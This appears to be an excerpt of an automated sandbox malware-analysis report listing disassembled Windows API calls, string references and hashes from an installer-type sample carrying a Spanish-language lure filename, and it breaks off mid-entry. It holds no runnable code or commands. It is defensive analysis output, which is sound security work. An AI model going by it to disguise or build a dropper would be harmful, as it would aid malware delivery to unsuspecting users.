                                                • API ID: Find$CloseFileFirst
                                                • String ID: xgB
                                                • API String ID: 2295610775-399326502
                                                • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                • Instruction ID: a17ed3a5ae88bd5f55df5b749dd223de66f1ff534e9406d7b6838b5a0b6fdea6
                                                • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                • Instruction Fuzzy Hash: 6FD01231904530ABC3111778BE0CC5B7A689F553717628F36F466F12F4C7348C22869C
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 0040550E
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040551D
                                                • GetClientRect.USER32(?,?), ref: 0040555A
                                                • GetSystemMetrics.USER32(00000002), ref: 00405561
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405582
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405593
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004055A6
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004055B4
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004055C7
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004055E9
                                                • ShowWindow.USER32(?,00000008), ref: 004055FD
                                                • GetDlgItem.USER32(?,000003EC), ref: 0040561E
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040562E
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405647
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405653
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040552C
                                                  • Part of subcall function 0040430B: SendMessageW.USER32(00000028,?,?,00404137), ref: 00404319
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405670
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005444,00000000), ref: 0040567E
                                                • CloseHandle.KERNEL32(00000000), ref: 00405685
                                                • ShowWindow.USER32(00000000), ref: 004056A9
                                                • ShowWindow.USER32(?,00000008), ref: 004056AE
                                                • ShowWindow.USER32(00000008), ref: 004056F8
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040572C
                                                • CreatePopupMenu.USER32 ref: 0040573D
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405751
                                                • GetWindowRect.USER32(?,?), ref: 00405771
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057C2
                                                • OpenClipboard.USER32(00000000), ref: 004057D2
                                                • EmptyClipboard.USER32 ref: 004057D8
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004057E4
                                                • GlobalLock.KERNEL32(00000000), ref: 004057EE
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405802
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405822
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 0040582D
                                                • CloseClipboard.USER32 ref: 00405833
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: (7B${
                                                • API String ID: 590372296-525222780
                                                • Opcode ID: 7b81bef466eecf8fc5be03d0848493cde9c99909255717e814f3fde5b1f34138
                                                • Instruction ID: 42ee76c5c0789c909e5484b793d5ed8b68dab9236198efc003755603ec60545b
                                                • Opcode Fuzzy Hash: 7b81bef466eecf8fc5be03d0848493cde9c99909255717e814f3fde5b1f34138
                                                • Instruction Fuzzy Hash: A4B16971900608FFDB119FA0DD89AAE7B79FB08354F00847AFA45B61A0CB754E51DF68
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E3A
                                                • ShowWindow.USER32(?), ref: 00403E57
                                                • DestroyWindow.USER32 ref: 00403E6B
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403E87
                                                • GetDlgItem.USER32(?,?), ref: 00403EA8
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBC
                                                • IsWindowEnabled.USER32(00000000), ref: 00403EC3
                                                • GetDlgItem.USER32(?,?), ref: 00403F71
                                                • GetDlgItem.USER32(?,00000002), ref: 00403F7B
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403F95
                                                • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403FE6
                                                • GetDlgItem.USER32(?,00000003), ref: 0040408C
                                                • ShowWindow.USER32(00000000,?), ref: 004040AD
                                                • EnableWindow.USER32(?,?), ref: 004040BF
                                                • EnableWindow.USER32(?,?), ref: 004040DA
                                                • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004040F0
                                                • EnableMenuItem.USER32(00000000), ref: 004040F7
                                                • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040410F
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404122
                                                • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 0040414B
                                                • SetWindowTextW.USER32(?,00423728), ref: 0040415F
                                                • ShowWindow.USER32(?,0000000A), ref: 00404293
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                • String ID: (7B
                                                • API String ID: 184305955-3251261122
                                                • Opcode ID: f84e0689071363ab1477e1e696561a800ba91aab3b6c651aaae0fe4fec38bdf6
                                                • Instruction ID: fc2721e09aaab4c72f4ebfdf2c157598dee1e076b88a1be66e463b94688f5fa6
                                                • Opcode Fuzzy Hash: f84e0689071363ab1477e1e696561a800ba91aab3b6c651aaae0fe4fec38bdf6
                                                • Instruction Fuzzy Hash: 6BC1C2B1600201FFCB21AF61ED85E2B3AB9EB95345F40057EFA41B11F0CB7998529B2D
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404511
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404525
                                                • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404542
                                                • GetSysColor.USER32(?), ref: 00404553
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404561
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040456F
                                                • lstrlenW.KERNEL32(?), ref: 00404574
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404581
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404596
                                                • GetDlgItem.USER32(?,0000040A), ref: 004045EF
                                                • SendMessageW.USER32(00000000), ref: 004045F6
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404621
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404664
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404672
                                                • SetCursor.USER32(00000000), ref: 00404675
                                                • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,?), ref: 0040468A
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404696
                                                • SetCursor.USER32(00000000), ref: 00404699
                                                • SendMessageW.USER32(00000111,?,00000000), ref: 004046C8
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004046DA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: N$open$C@
                                                • API String ID: 3615053054-346628716
                                                • Opcode ID: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                • Instruction ID: 5d26fd4bbf68afdbde40cdeb5130b050e05e11fe2774b22c09997c19ee455d7e
                                                • Opcode Fuzzy Hash: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                • Instruction Fuzzy Hash: 507193B1A00209BFDB109F60DD85E6A7B69FB85344F00843AFA41B62E0D77D9961DF68
                                                APIs
                                                  • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                  • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,758E3420,00437800,00435000,00000000), ref: 00403ADC
                                                • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,758E3420), ref: 00403B5C
                                                • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403B6F
                                                • GetFileAttributesW.KERNEL32(004281E0), ref: 00403B7A
                                                • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403BC3
                                                  • Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166
                                                • RegisterClassW.USER32(004291E0), ref: 00403C00
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C18
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C4D
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403C83
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403CAF
                                                • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403CBC
                                                • RegisterClassW.USER32(004291E0), ref: 00403CC5
                                                • DialogBoxParamW.USER32(?,00000000,00403DFE,00000000), ref: 00403CE4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-1425696872
                                                • Opcode ID: 79ced56dd26c0ff77d64edd357f236dd0286a48db6ccf6fd94af835ac0c2a086
                                                • Instruction ID: a49deb01357f173a4aad96dc60f9d02752f373419f451c4cfac2514e29acbaba
                                                • Opcode Fuzzy Hash: 79ced56dd26c0ff77d64edd357f236dd0286a48db6ccf6fd94af835ac0c2a086
                                                • Instruction Fuzzy Hash: ED61C370240300BAD620AF669D45E2B3A7CEB84749F40457EF941B22E2DB7D9D52CA2D
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
                                                • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
                                                APIs
                                                • lstrcpyW.KERNEL32(00426DC8,NUL,?,00000000,?,?,004060D4,?,?), ref: 00405F50
                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,004060D4,?,?), ref: 00405F74
                                                • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405F7D
                                                  • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                  • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F9A
                                                • wsprintfA.USER32 ref: 00405FB8
                                                • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405FF3
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406002
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040603A
                                                • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00406090
                                                • GlobalFree.KERNEL32(00000000), ref: 004060A1
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004060A8
                                                  • Part of subcall function 00405DE7: GetFileAttributesW.KERNEL32(00000003,00402F18,00438800,80000000,00000003), ref: 00405DEB
                                                  • Part of subcall function 00405DE7: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405E0D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                • String ID: %ls=%ls$NUL$[Rename]
                                                • API String ID: 222337774-899692902
                                                • Opcode ID: 7a31f0ca2a0c3c6aeb2afde018fafd2c9dbddcd7edc30aa6bda7bedb692985a5
                                                • Instruction ID: 33b5be0cf5b447351be1faad876236776c79ee828f4547529858959512194336
                                                • Opcode Fuzzy Hash: 7a31f0ca2a0c3c6aeb2afde018fafd2c9dbddcd7edc30aa6bda7bedb692985a5
                                                • Instruction Fuzzy Hash: 6F3126702407147FC220AB219D09F6B3A9CEF45798F16003BF942F62D2DA7CD8218ABD
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 004047C0
                                                • SetWindowTextW.USER32(00000000,?), ref: 004047EA
                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040489B
                                                • CoTaskMemFree.OLE32(00000000), ref: 004048A6
                                                • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004048D8
                                                • lstrcatW.KERNEL32(?,004281E0), ref: 004048E4
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048F6
                                                  • Part of subcall function 0040593B: GetDlgItemTextW.USER32(?,?,00000400,0040492D), ref: 0040594E
                                                  • Part of subcall function 004064A6: CharNextW.USER32(?,*?|<>/":,00000000,00000000,758E3420,00437800,00435000,00403425,00437800,00437800,00403672), ref: 00406509
                                                  • Part of subcall function 004064A6: CharNextW.USER32(?,?,?,00000000), ref: 00406518
                                                  • Part of subcall function 004064A6: CharNextW.USER32(?,00000000,758E3420,00437800,00435000,00403425,00437800,00437800,00403672), ref: 0040651D
                                                  • Part of subcall function 004064A6: CharPrevW.USER32(?,?,758E3420,00437800,00435000,00403425,00437800,00437800,00403672), ref: 00406530
                                                • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 004049B9
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049D4
                                                  • Part of subcall function 00404B2D: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                  • Part of subcall function 00404B2D: wsprintfW.USER32 ref: 00404BD7
                                                  • Part of subcall function 00404B2D: SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: (7B$A
                                                • API String ID: 2624150263-3645020878
                                                • Opcode ID: 191733ff5b5d9becb13fbf8f332b56dc9348a39c1b60d49dd0cb3c1ff44a3ff1
                                                • Instruction ID: 8b4fcc303a4382937c11c1a66aa2d821073b610587f94151fb5846b241658984
                                                • Opcode Fuzzy Hash: 191733ff5b5d9becb13fbf8f332b56dc9348a39c1b60d49dd0cb3c1ff44a3ff1
                                                • Instruction Fuzzy Hash: 13A14FF1A00209ABDB11AFA5C941AAF77B8EF84314F10847BF611B62D1D77C8A418F6D
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402EE9
                                                • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F05
                                                  • Part of subcall function 00405DE7: GetFileAttributesW.KERNEL32(00000003,00402F18,00438800,80000000,00000003), ref: 00405DEB
                                                  • Part of subcall function 00405DE7: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405E0D
                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402F4E
                                                • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 00403095
                                                Strings
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040312C
                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030DE
                                                • Null, xrefs: 00402FCE
                                                • Inst, xrefs: 00402FBC
                                                • Error launching installer, xrefs: 00402F25
                                                • soft, xrefs: 00402FC5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 2803837635-787788815
                                                • Opcode ID: 42065c0ab5b29b2b2b83307d5915b3acc3d96901d6fcfbc8444800a32ebbfbd8
                                                • Instruction ID: 3828440c67d76786f1e0e44594fc16ccb97003feb117245618602a5e37269db8
                                                • Opcode Fuzzy Hash: 42065c0ab5b29b2b2b83307d5915b3acc3d96901d6fcfbc8444800a32ebbfbd8
                                                • Instruction Fuzzy Hash: 5E61C271A01204ABDB20DF65DD85B9E7BB8EB04355F20417BFA00F62D1CB7C9A458B9D
                                                APIs
                                                • GetVersion.KERNEL32(00000000,00422708,?,004053A8,00422708,00000000,00000000,00000000), ref: 004062F7
                                                • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 00406375
                                                • GetWindowsDirectoryW.KERNEL32(004281E0,00000400), ref: 00406388
                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004063C4
                                                • SHGetPathFromIDListW.SHELL32(?,004281E0), ref: 004063D2
                                                • CoTaskMemFree.OLE32(?), ref: 004063DD
                                                • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406401
                                                • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,004053A8,00422708,00000000,00000000,00000000), ref: 0040645B
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406343
                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004063FB
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 900638850-730719616
                                                • Opcode ID: 66ef25a80f16a6104390fbc1b6e992016b9d13106f7151c12c6dc6c766d89db1
                                                • Instruction ID: 8986ea92d4020f82ea273b0cadebf120af401304848ce5cddb84501886c13395
                                                • Opcode Fuzzy Hash: 66ef25a80f16a6104390fbc1b6e992016b9d13106f7151c12c6dc6c766d89db1
                                                • Instruction Fuzzy Hash: C661E371A00115EBDB209F24CD40AAE37A5AF50314F52817FE947BA2D0D73D8AA6CB9D
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040435A
                                                • GetSysColor.USER32(00000000), ref: 00404376
                                                • SetTextColor.GDI32(?,00000000), ref: 00404382
                                                • SetBkMode.GDI32(?,?), ref: 0040438E
                                                • GetSysColor.USER32(?), ref: 004043A1
                                                • SetBkColor.GDI32(?,?), ref: 004043B1
                                                • DeleteObject.GDI32(?), ref: 004043CB
                                                • CreateBrushIndirect.GDI32(?), ref: 004043D5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                • Instruction ID: f1e38b434243e48c2b46a4a8fcf45a1f38fac15713e13bd475e5664ee3236b4b
                                                • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                • Instruction Fuzzy Hash: F0215171600704ABCB219F68DD48B5BBBF8AF41714F04892DEDD5E26E0D778E904CB54
                                                APIs
                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004026CC
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402707
                                                • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402740
                                                  • Part of subcall function 00405EC8: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405EDE
                                                • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027EC
                                                Strings
                                                Memory Dump Source
